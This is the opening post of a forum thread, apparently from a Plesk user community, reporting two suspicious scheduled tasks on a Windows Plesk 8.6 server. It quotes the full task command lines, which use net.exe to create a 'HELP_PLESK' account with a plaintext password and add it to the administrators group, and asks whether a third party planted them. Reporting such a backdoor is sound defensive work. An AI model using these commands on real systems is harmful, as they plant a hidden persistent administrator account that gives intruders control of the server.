1. Please take a little time for this simple survey! Thank you for participating!
    Dismiss Notice
  2. Dear Pleskians, please read this carefully! New attachments and other rules Thank you!
    Dismiss Notice
  3. Dear Pleskians, I really hope that you will share your opinion in this Special topic for chatter about Plesk in the Clouds. Thank you!
    Dismiss Notice

Suspicious Plesk scheduled task

Discussion in 'Plesk for Windows - 8.x and Older' started by Inspiring, Jun 29, 2010.

1. Inspiring

Inspiring New Pleskian

57%
    Hi All,

I have noticed that there is two scheduled task from Plesk that is scheduled to run every midnight (Plesk 8.6):

===================

Plesk Scheduler Task #56974aa80611c7ea2f93f0617354d813

C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\Parallels\Plesk\admin\bin\runtask.exe" --defaultmail "--application=net.exe" "--parameters=user HELP_PLESK apassword /add""

Plesk Scheduler Task #5ff893fff01088772737ca70b1fef982

C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\Parallels\Plesk\admin\bin\runtask.exe" --defaultmail "--application=net.exe" "--parameters=localgroup administrators HELP_PLESK /add""

===================

Both of the task is added to the system the same time as other Plesk scheduled tasks such as statistics.exe

I have tested to login as this new user created via remote desktop, and I was granted full administrator right...

Does anyone have the above two scheduled tasks? Or do you think that these two tasks is added by third party?